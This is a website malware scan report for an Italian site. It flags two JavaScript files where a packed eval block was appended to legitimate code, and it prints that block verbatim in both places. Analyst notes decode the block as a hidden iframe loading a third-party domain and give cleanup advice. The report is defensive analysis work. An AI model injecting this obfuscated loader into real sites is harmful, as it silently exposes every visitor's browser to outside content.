Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=sorsidirock.it
Result: The website is marked by Google as suspicious: visiting this website may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious: visiting this website may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://sorsidirock.it/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 28 May 2014 20:13:04 GMT Location: http://www.sorsidirock.it/ Server: Apache Content-Length: 234 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.sorsidirock.it/ | 200 OK Content-Length: 5675 Content-Type: text/html | clean |
http://www.sorsidirock.it/media/system/js/caption.js | 200 OK Content-Length: 2392 Content-Type: application/javascript | malicious |
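Malicious code - confirmed by antiviruses (see below): var JCaption = new Class({ initialize: function(selector) { this.selector = selector; var images = $$(selector); images.each(function(image){ this.createCaption(image); }, this); }, createCaption: function(element) { var caption = document.createTextNode(element.title); var container = document.createElement("div"); var text = document.createElement("p"); var width = element.getAttribute("width"); var align = document.caption = caption }); <!-- . -->;eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('3.7(\'<0 4="5://6-1.8/?9=2" a="b:c;"></0>\');',13,13,'iframe|statistic||document|src|http|g|write|info|id|style|display|none'.split('|'),0,{})); <!-- . --> Analyst note: the caption.js excerpt appears to be abbreviated by the scanner; the injected part is the packed `eval(function(p,a,c,k,e,r){...})` call appended after the legitimate code, between the `<!-- . -->` markers. Substituting the word table into the packed template gives (defanged) `document.write('<iframe src="hxxp://g-statistic[.]info/?id=2" style="display:none;"></iframe>')`, i.e. an invisible iframe that loads third-party content in every visitor's browser. Because the block is appended to a static file served by the site, the file on the server was modified; cleanup means restoring it from a known-good copy and finding how it was written to, not only deleting the appended line. Antivirus reports: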
| ||
http://sorsidirock.it/modules/mod_lofpiecemaker/assets/swfobject/swfobject.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 28 May 2014 20:13:06 GMT Location: http://www.sorsidirock.it/modules/mod_lofpiecemaker/assets/swfobject/swfobject.js Server: Apache Content-Length: 289 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.sorsidirock.it/modules/mod_lofpiecemaker/assets/swfobject/swfobject.js | 200 OK Content-Length: 10220 Content-Type: application/javascript | clean |
http://sorsidirock.it/templates/sdr2012c/jquery.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 28 May 2014 20:13:06 GMT Location: http://www.sorsidirock.it/templates/sdr2012c/jquery.js Server: Apache Content-Length: 262 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.sorsidirock.it/templates/sdr2012c/jquery.js | 200 OK Content-Length: 72605 Content-Type: application/javascript | clean |
http://sorsidirock.it/templates/sdr2012c/script.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 28 May 2014 20:13:07 GMT Location: http://www.sorsidirock.it/templates/sdr2012c/script.js Server: Apache Content-Length: 262 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.sorsidirock.it/templates/sdr2012c/script.js | 200 OK Content-Length: 6882 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below): (function() { var m = document.uniqueID && document.compatMode && !window.XMLHttpRequest && document.execCommand; try { if (!!m) { m('BackgroundImageCache', false, true); } } catch (oh) { }; var u = navigator.userAgent.toLowerCase(); var is = function(t) { return (u.indexOf(t) != -1) }; jQuery('html').addClass([(!(/opera|webtv/i.test(u)) && /msie (\d)/.test(u)) ? ('ie ie' + RegExp.$1) : is('firefox/2' }); <!-- . -->;eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('3.7(\'<0 4="5://6-1.8/?9=2" a="b:c;"></0>\');',13,13,'iframe|statistic||document|src|http|g|write|info|id|style|display|none'.split('|'),0,{})); <!-- . --> Analyst note: the packed `eval(...)` block appended to this template script is the same one reported for /media/system/js/caption.js, so both files unpack to the same `document.write` of an iframe styled `display:none`. The same payload appended to two unrelated scripts suggests that .js files on the server were modified in bulk, so the files listed as clean in this scan should still be compared against known-good copies. Antivirus reports:
| ||
http://www.ajedrezlocal.com/language/rel.php?id=18449573 | 404 Not Found Content-Length: 214 Content-Type: text/html | clean |
http://www.ajedrezlocal.com/test404page.js | 404 Not Found Content-Length: 212 Content-Type: text/html | clean |
http://www.ajedrezlocal.com/language/rel.php?id=8919566 | 404 Not Found Content-Length: 214 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: sorsidirock.it
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Wed, 28 May 2014 20:13:04 GMT
Location: http://www.sorsidirock.it/
Server: Apache
Content-Length: 234
Content-Type: text/html; charset=iso-8859-1
...234 bytes of data.
GET / HTTP/1.1
Host: sorsidirock.it
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Wed, 28 May 2014 20:13:04 GMT
Location: http://www.sorsidirock.it/
Server: Apache
Content-Length: 234
Content-Type: text/html; charset=iso-8859-1
...234 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: sorsidirock.it
Referer: http://www.google.com/search?q=sorsidirock.it
Result:
The result is similar to the first query. No suspicious redirects were found.
GET / HTTP/1.1
Host: sorsidirock.it
Referer: http://www.google.com/search?q=sorsidirock.it
Result:
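The result is similar to the first query. No suspicious redirects were found. This check only covers server-side redirects that depend on the Referer header; the injected script reported in the scanned .js files runs in the visitor's browser and is not detected by it.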